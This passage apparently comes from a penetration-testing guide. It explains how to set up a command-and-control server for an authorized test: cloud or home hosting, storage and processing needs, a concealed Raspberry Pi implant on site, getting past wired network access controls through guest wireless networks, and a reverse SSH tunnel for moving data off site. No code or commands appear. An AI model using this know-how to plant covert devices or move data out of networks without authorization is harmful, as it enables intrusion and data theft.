Command and control servers

Command and control servers, or C&C servers, have a negative perception due to their extensive use for malicious purposes, such as delivering malware or other malicious payloads. For the same reasons they are used in a negative manner, they can also be used in a positive way. These C&C servers serve as the perfect way to get the data or evidence you are collecting to an offsite server so that you can review, arrange, and finalize it. You never want to leave any evidence that you were on a particular system or even leave any files or findings behind. This is where C&C servers come into play, as they can be a single source for all your penetration-testing evidence.

Where your C&C server resides is really up to you. Most of the time, C&C servers reside in someone's cloud. This could be within AWS, Azure, or any other cloud flavor of your choice. However, it doesn't have to be a cloud-based solution. You could have a server in your company office or even within your home lab in which you have that secure channel back. The choice is yours. The important thing is that it needs the following:

• Lots of connectivity
• The ability to access it remotely
• Access to the local on-premise box
• It must be cost-effective

C&C servers can be anywhere based on your preference. But even though they can be anywhere and anything, there still need to be some requirements to make sure you have an effective setup that will help streamline your penetration test, not hamper it.

Here are some of the requirements that you may need for a penetration-testing C&C server setup:

• Processing capabilities: They are potentially needed to drill into large captures with Wireshark, password cracking, or any other CPU-intensive programs. You need to make sure you have the processing power to perform these tasks in a reasonable manner. If it takes 30 days to crack a wireless password that changes every week, then the task is pointless. Keep this in mind when picking out the specifications of the system.
• 500 GB + of disk space: Evidence will add up as you continue the penetration test. Various findings such as your notes will be small; however, screenshots and traffic captures will add up quickly. Make sure you have as much space as possible; it never hurts to overprovision this.
• Local on-prem box: You will want to have a local box on-site that will talk to your C&C server remotely. I tend to prefer the Raspberry Pi for this task as it's small and concealable, yet powerful enough to run a full operating system such as Kali. Since this box doesn't need to perform intense processing, it doesn't need to be a full-sized laptop or server. It just needs to pass the data over. It should have a wireless interface, if possible, to have additional connectivity options. Many companies have NAC-based solutions that will detect wired devices, but are often less stringent on the wireless side. Also, depending on whether or not the company knows you have a device there, you may jack into a port with a non- Internet facing VLAN. I prefer wireless so that I can jump on a guest SSID or another non-corporate restricted SSID and do my transfers at will. It should also have multiple wireless interfaces, if possible, so you can do some wireless attacks, as well as a Bluetooth interface.
• Secure channel between the local box and the C&C server: This is typically a reverse SSH tunnel. You want to make sure it's secure and encrypted so that others can't steal your evidence and use it against the company you are working for.